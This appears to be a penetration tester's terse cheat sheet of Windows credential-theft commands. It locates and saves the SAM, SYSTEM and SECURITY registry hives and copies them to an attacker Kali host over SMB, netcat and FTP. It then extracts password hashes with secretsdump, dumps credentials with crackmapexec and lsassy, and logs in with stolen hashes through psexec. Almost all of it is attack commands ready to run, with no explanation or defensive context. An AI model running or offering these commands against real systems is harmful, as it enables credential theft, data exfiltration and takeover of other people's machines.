================================== 
Check
dir C:\Windows\Repair\SAM
dir C:\Windows\Repair\SYSTEM
dir C:\Windows\System32\config\SAM
dir C:\Windows\System32\config\SYSTEM
dir C:\Windows\System32\config\RegBack\SAM 
dir C:\Windows\System32\config\RegBack\SYSTEM 
for %F in ("C:\Windows\Repair" "C:\Windows\System32\config" "C:\Windows\System32\config\RegBack" "") do (
  dir /s /b /o:gn "%F"
) | findstr SAM

================================== 
Favorite

python3 smbserver.py share `pwd` -smb2support -username mike -password helps
cd C:\Windows\Temp\
cd C:\Users\Bob\Downloads\
net use \\192.168.162.46\share /USER:mike helps
copy *x \\192.168.162.46\share\  
copy samx \\192.168.162.46\share\  
copy systemx \\192.168.162.46\share\  
copy securityx \\192.168.162.46\share\  
secretsdump -sam samx -system systemx LOCAL  

================================== 
reg save hklm\sam C:\Windows\Temp\samx
reg save hklm\system C:\Windows\Temp\systemx
reg save hklm\security C:\Windows\Temp\securityx

================================== 
cd C:\Windows\temp\
cd C:\Users\Administrator\Downloads\
reg.exe save hklm\sam samx
reg.exe save hklm\security securityx
reg.exe save hklm\system systemx

================================== 
Upload to Kali

python3 /usr/share/doc/python3-impacket/examples/smbserver.py share `pwd` -smb2support
copy *x \\192.168.162.46\share\
copy C:\Windows\Repair\SAM \\192.168.162.46\share\
copy C:\Windows\Repair\SYSTEM \\192.168.162.46\share\

nc -nvlp 4444 > samx   
nc -nvlp 4444 > systemx   
nc -nvlp 4444 > securityx  
nc.exe -nv 192.168.162.46 4444 < samx   
nc.exe -nv 192.168.162.46 4444 < systemx  
nc.exe -nv 192.168.162.46 4444 < securityx

Kali> sudo python3 -m pyftpdlib -p 21 -u mike -P helps -w  
ftp 192.168.162.46
mike  
helps  
PUT samx  
PUT systemx  
PUT securityx  
bye  


================================== 
Cleanup
del samx systemx securityx

================================== 
Crackmapexec

cme smb ./targetip.txt -u bob -p 'paxx' --local-auth --sam
cme smb 192.168.200.5 -u bob -p 'paxx' -d mydom -M lsassy


================================== 
secretsdump -sam samx -system systemx LOCAL
psexec administrator@192.168.200.5 -hashes aad3bxyz:efds123xyz
